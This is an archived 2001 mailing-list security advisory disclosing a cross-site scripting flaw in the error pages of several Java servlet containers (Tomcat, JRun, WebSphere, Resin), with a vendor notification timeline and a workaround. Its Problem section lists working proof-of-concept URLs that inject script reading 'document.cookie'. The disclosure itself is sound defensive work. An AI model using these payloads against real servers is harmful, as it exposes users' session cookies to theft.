OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: TAKAGI, Hiromitsu (takagietl.go.jp)
Date: Mon Jul 02 2001 - 06:31:00 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Multiple Vendor Java Servlet Container Cross-Site Scripting Vulnerability
    =========================================================================

    Affected products:
    =================
      Tomcat 3.2.1, 3.2.2-beta, 4.0-beta
         <http://jakarta.apache.org/tomcat/>
      JRun 3.0
         <http://www.allaire.com/products/jrun/index.cfm>
      WebSphere 3.5 FP2, 3.02, VisualAge for Java 3.5 Professional
         <http://www-4.ibm.com/software/webservers/>
      Resin
         <http://www.caucho.com/products/resin/>

    Not affected:
    ============
      Unknown

    Problem:
    =======
      Accessing the following URLs, the JavaScript code will be executed
      in the browser on the server's domain.

      Tomcat 3.2.1:
        http://Tomcat/jsp-mapped-dir/>alert(document.cookie)</SCRIPT>.jsp
      JRun 3.0:
            http://JRun/>alert(document.cookie)</SCRIPT>.shtml
            http://JRun/>alert(document.cookie)</SCRIPT>.jsp
            http://JRun/>alert(document.cookie)</SCRIPT>.thtml
      WebSphere 3.5 FP2:
            http://WebSphere/webapp/examples/>alert(document.cookie)</SCRIPT>
      WebSphere 3.02:
            http://WebSphere/>alert(document.cookie)</SCRIPT>.jsp
      VisualAge for Java 3.5 Professional:
            http://VisualAge-WebSphere-Test-Environment/>alert(document.cookie)</SCRIPT>
      Resin 1.2.2:
            http://Reisin/>alert(document.cookie)</SCRIPT>.jsp
            http://www.caucho.com/>document.write(document.cookie)</SCRIPT>.jsp

      These pages produce output like this:
      =================================================
      Error 404
      An error has occurred while processing request:
          http://WebSphere/webapp/examples/******
      
      Message: File not found: //******
      StackTrace: com.ibm.servlet.engine.webapp.WebAppErrorReport: File not found: //******
              at javax.servlet.ServletException.<init>(ServletException.java:107)
              at com.ibm.websphere.servlet.error.ServletErrorReport.<init>(ServletErrorReport.java:31)
              at com.ibm.servlet.engine.webapp.WebAppErrorReport.<init>(WebAppErrorReport.java:20)
              at com.ibm.servlet.engine.webapp.WebAppDispatcherResponse.sendError(WebAppDispatcherResponse.java:97)
              ...
      =================================================
      ******: The JavaScript code is executed here.

      This vulnerability is quite similar to "IIS cross-site scripting
      vulnerabilities (MS00-060)" reported by Microsoft on August 25, 2000.
      <http://www.microsoft.com/technet/security/bulletin/ms00-060.asp>

    Impact:
    ======
      For the detail about cross-site scripting, see the following pages.
      <http://www.cert.org/advisories/CA-2000-02.html>
      <http://www.microsoft.com/TechNet/security/crssite.asp>
      <http://www.apache.org/info/css-security/>

    Vendor status:
    =============

      Tomcat:
      ======
        Notified:
          16 Mar 2001 04:32:02 +0900, I-found-a-security-problem-in-the-apache-source-codeapache.org
          17 Mar 2001 18:55:45 +0900, tomcat-devjakarta.apache.org
        Response:
          17 Mar 2001 20:07:42 -0000
        Fix:
          30 Mar 2001, Tomcat 4.0-beta-2 (maybe)
          11 May 2001, Tomcat 3.2.2-beta-5 (maybe)
        Announcement:
          <http://jakarta.apache.org/tomcat/news.html>

          Sun Microsystems does not publish Tomcat vulnerabilities.
          <http://java.sun.com/products/jsp/tomcat/>
          <http://java.sun.com/sfaq/chronology.html>

      JRun:
      ====
        Notified:
          13 Mar 2001 23:11:54 +0900, secureallaire.com
        Response:
          13 Mar 2001 09:43:49 -0500
          14 Mar 2001 09:05:03 -0500
        Fix:
          28 Jun 2001, Patches for JRun 3.0 and JRun 2.3.3 are available.
        Announcement:
          <http://www.allaire.com/handlers/index.cfm?ID=21498&Method=Full>
          Macromedia Product Security Bulletin (MPSB01-06)
          JRun 3.1, JRun 3.0, JRun 2.3.3: Cross-site scripting vulnerability
          (a.k.a. JavaScript code execution vulnerability)

      WebSphere:
      =========
        Notified:
          20 Mar 2001 08:13:30 +0900, *******us.ibm.com
        Response:
          22 Mar 2001 09:14:01 -0500
          23 Mar 2001 00:02:58 +0900
        Fix:
          PQ47386V302x (?)
          <http://www-4.ibm.com/software/webservers/appserv/efix.html>
        Announcement:
          <http://www-6.ibm.com/jp/domino01/software/websphere.nsf/TechWeb/EC48D03C7060EAFA49256A1C0009C9F4?openDocument&&ViewName=TechWeb>
          (in Japanese)

      Resin:
      =====
        Notified:
          16 Mar 2001 02:26:47 +0900, bugscaucho.com, resincaucho.com
        Response:
          None
        Fix:
          Unknown
        Announcement:
          Unknown
          http://www.caucho.com/products/resin/changes.xtp

    Workaround:
    ==========
      Customize error pages. 

    --
Hiromitsu Takagi, Ph.D.
National Institute of Advanced Industrial Science and Technology,
Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan
http://www.etl.go.jp/~takagi/